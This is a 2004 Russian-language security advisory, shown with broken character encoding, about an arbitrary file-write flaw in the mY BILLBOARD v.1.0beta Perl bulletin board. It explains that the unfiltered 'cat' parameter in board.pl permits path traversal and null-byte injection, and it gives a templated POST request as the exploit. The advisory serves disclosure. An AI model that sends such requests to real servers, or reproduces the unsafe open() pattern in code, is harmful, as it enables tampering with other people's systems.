»зменение произвольных файлов на сервере в mY BILLBOARD v.1.0beta

ƒата публикации:
12.07.2004
¬сего просмотров:
1197
ќпасность:
—редн€€
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
”€звимые версии: mY BILLBOARD v.1.0beta

ќписание: ”€звимость в доске объ€влений mY BILLBOARD v.1.0beta позвол€ет измен€ть содержание произвольных файлов на сервере.

¬ сценарии board.pl не фильтруетс€ значение параметра "cat", который отвечает за название файла сообщений. ѕоэтому можно изменить название и расположение файла в который записываетс€ сообщение. ќткрытие происходит функцией open(BOARD,"+<data/$cat.txt"), поэтому при добавленни null байта - "%00" мы заставим сценарий проигнорировать ".txt", а при добавлении "../" мы поднимемс€ на директорию выше.

ѕример/Ёксплоит:

Connect targethost:80

POST /cgi-bin/board/board.pl HTTP/1.0
Content-Length: 61

action=add&cat=[FILENAME]%00&names=test&city=test&text=[TEXT]

URL производител€: http://perl.webservis.ru

–ешение:—пособов устранени€ обнаруженной у€звимости не существует в насто€щее врем€.

”€звимость обнаружил »ван ∆данов [dokk21@rambler.ru]

или введите им€

CAPTCHA